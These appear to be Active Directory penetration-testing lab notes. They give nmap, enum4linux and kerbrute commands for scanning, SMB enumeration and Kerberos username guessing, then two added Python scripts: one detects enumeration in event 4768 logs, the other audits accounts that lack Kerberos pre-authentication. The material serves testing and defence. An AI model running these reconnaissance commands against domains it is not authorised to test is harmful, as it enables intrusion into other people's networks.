AD Pentesting

Start with a Simple Nmap scan

LDAP also exposes the domain name, so look for Domain-name.local in the output for port 389 (LDAP).

nmap -O -sS -sV 142.168.168.20/24

The nmap scan shows that this Windows machine has AD services installed on it.


Enumerate ports 139/445 (NetBIOS/SMB)

  • What is the NetBIOS-Domain Name of the machine?

enum4linux -n 10.49.160.26
enum4linux -A spookysec.local

Enumerating Users via Kerberos

Kerbrute lets us enumerate valid usernames against the domain controller.

./kerbrute_linux_amd64 userenum userslist.txt -d Domain-name.local --dc Domain-name.local
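From the defender's side, the enumeration above leaves a clear trace: every AS-REQ for a name that does not exist makes the KDC log Security event 4768 with Result Code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN), and a wordlist produces many such failures for many distinct names from one client in a few seconds. The script below is an added example (not part of these notes and not Kerbrute's code) that detects that pattern over a handful of constructed 4768 records; the pipe-separated line format and all names and addresses are made up for the example.

```python
"""Detect Kerberos username enumeration in Windows Security event 4768 records.

A wordlist sprayed at the KDC yields a burst of 4768 events with Status 0x6
(KDC_ERR_C_PRINCIPAL_UNKNOWN) for many *distinct* TargetUserNames from one
client address.  Normal typos give one or two such events per client.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample (not real logs): "timestamp|key=value|..." per 4768 event.
# 10.0.0.9 is an ordinary user who mistyped a name once; 10.0.0.5 is a host
# trying six non-existent names within four seconds.
SAMPLE_4768 = """\
2024-01-10T09:00:00|EventID=4768|TargetUserName=svc-backup|IpAddress=::ffff:10.0.0.9|Status=0x0
2024-01-10T09:00:01|EventID=4768|TargetUserName=svc-bakup|IpAddress=::ffff:10.0.0.9|Status=0x6
2024-01-10T09:00:02|EventID=4768|TargetUserName=user01|IpAddress=::ffff:10.0.0.5|Status=0x6
2024-01-10T09:00:02|EventID=4768|TargetUserName=user02|IpAddress=::ffff:10.0.0.5|Status=0x6
2024-01-10T09:00:03|EventID=4768|TargetUserName=user03|IpAddress=::ffff:10.0.0.5|Status=0x6
2024-01-10T09:00:03|EventID=4768|TargetUserName=user04|IpAddress=::ffff:10.0.0.5|Status=0x6
2024-01-10T09:00:04|EventID=4768|TargetUserName=user05|IpAddress=::ffff:10.0.0.5|Status=0x6
2024-01-10T09:00:05|EventID=4768|TargetUserName=user06|IpAddress=::ffff:10.0.0.5|Status=0x6
2024-01-10T09:00:06|EventID=4768|TargetUserName=user01|IpAddress=::ffff:10.0.0.5|Status=0x6
"""

KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"


def parse_event(line):
    """Turn one constructed log line into a dict with a datetime timestamp."""
    ts_str, *fields = line.split("|")
    record = {"timestamp": datetime.fromisoformat(ts_str)}
    for field in fields:
        key, _, value = field.partition("=")
        record[key] = value
    return record


def normalise_ip(ip):
    """Windows logs IPv4 clients as IPv4-mapped IPv6 ('::ffff:a.b.c.d'); strip the prefix."""
    return ip[7:] if ip.startswith("::ffff:") else ip


def find_enumeration(lines, window=timedelta(seconds=60), threshold=5):
    """Return {client_ip: [distinct unknown names]} for clients that asked for
    at least `threshold` distinct non-existent accounts within `window`."""
    failures = defaultdict(list)  # ip -> [(timestamp, requested_name), ...]
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        if ev.get("EventID") == "4768" and ev.get("Status") == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            failures[normalise_ip(ev["IpAddress"])].append(
                (ev["timestamp"], ev["TargetUserName"].lower()))

    alerts = {}
    for ip, events in failures.items():
        events.sort()
        best = set()
        start = 0
        # Sliding window: keep the largest set of distinct names seen within `window`.
        for end, (t_end, _) in enumerate(events):
            while t_end - events[start][0] > window:
                start += 1
            names = {name for _, name in events[start:end + 1]}
            if len(names) > len(best):
                best = names
        if len(best) >= threshold:
            alerts[ip] = sorted(best)
    return alerts


if __name__ == "__main__":
    for ip, names in find_enumeration(SAMPLE_4768.splitlines()).items():
        print(f"possible username enumeration from {ip}: {len(names)} unknown names: {names}")
```

The window and threshold are tuning knobs: a help desk that regularly mistypes names will sit well below five distinct unknown principals per minute, while a wordlist run crosses it within seconds. Counting distinct names rather than raw events is what separates a spray from a single script retrying one bad account.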

Find the hashes of the valid users

Look for users who do not require Kerberos pre-authentication (pre-auth disabled).
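Whether pre-authentication is required is a per-account setting: bit 0x400000 (UF_DONT_REQUIRE_PREAUTH, decimal 4194304) of the userAccountControl attribute. An administrator can audit for it with the LDAP bitwise-AND matching rule, and the added example below (not from these notes or any tool they mention) shows that filter and decodes the attribute over a few constructed directory entries, so the weak accounts can be found and the box unticked before anyone else looks for them. The account names and attribute values are constructed for the example.

```python
"""Audit Active Directory accounts that do not require Kerberos pre-authentication.

userAccountControl is a bit field; the relevant bits are documented by Microsoft.
Entries below are constructed stand-ins for what an LDAP search would return.
"""

# userAccountControl flag bits (Microsoft-documented values)
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

# LDAP filter an administrator can run against the directory to list such accounts:
# 1.2.840.113556.1.4.803 is the LDAP_MATCHING_RULE_BIT_AND extended match.
LDAP_FILTER_NO_PREAUTH = (
    "(&(objectCategory=person)(objectClass=user)"
    f"(userAccountControl:1.2.840.113556.1.4.803:={UF_DONT_REQUIRE_PREAUTH}))"
)

# Constructed directory entries: (sAMAccountName, userAccountControl)
SAMPLE_ENTRIES = [
    ("alice", UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD),                            # 66048, fine
    ("svc-legacy", UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD | UF_DONT_REQUIRE_PREAUTH),  # 4260352, weak
    ("old-contractor", UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH),  # 4194818, weak but disabled
    ("bob", UF_NORMAL_ACCOUNT),                                                      # 512, fine
]


def decode_uac(value):
    """Return the set of named flags present in a userAccountControl value."""
    names = {
        UF_ACCOUNTDISABLE: "ACCOUNTDISABLE",
        UF_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
        UF_DONT_EXPIRE_PASSWD: "DONT_EXPIRE_PASSWD",
        UF_DONT_REQUIRE_PREAUTH: "DONT_REQUIRE_PREAUTH",
    }
    return {name for bit, name in names.items() if value & bit}


def accounts_without_preauth(entries, include_disabled=False):
    """Names of accounts with DONT_REQUIRE_PREAUTH set, sorted.

    Disabled accounts cannot obtain a TGT, so they are excluded by default;
    pass include_disabled=True to see them too (they should still be cleaned up).
    """
    found = []
    for name, uac in entries:
        if not uac & UF_DONT_REQUIRE_PREAUTH:
            continue
        if uac & UF_ACCOUNTDISABLE and not include_disabled:
            continue
        found.append(name)
    return sorted(found)


if __name__ == "__main__":
    print("LDAP filter:", LDAP_FILTER_NO_PREAUTH)
    for name in accounts_without_preauth(SAMPLE_ENTRIES, include_disabled=True):
        uac = dict(SAMPLE_ENTRIES)[name]
        print(f"{name}: userAccountControl={uac} ({', '.join(sorted(decode_uac(uac)))})")
```

Any enabled account the audit returns should have "Do not require Kerberos preauthentication" cleared unless a documented legacy dependency needs it, and service accounts that must keep it should carry a long random password so an offline guess is impractical.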
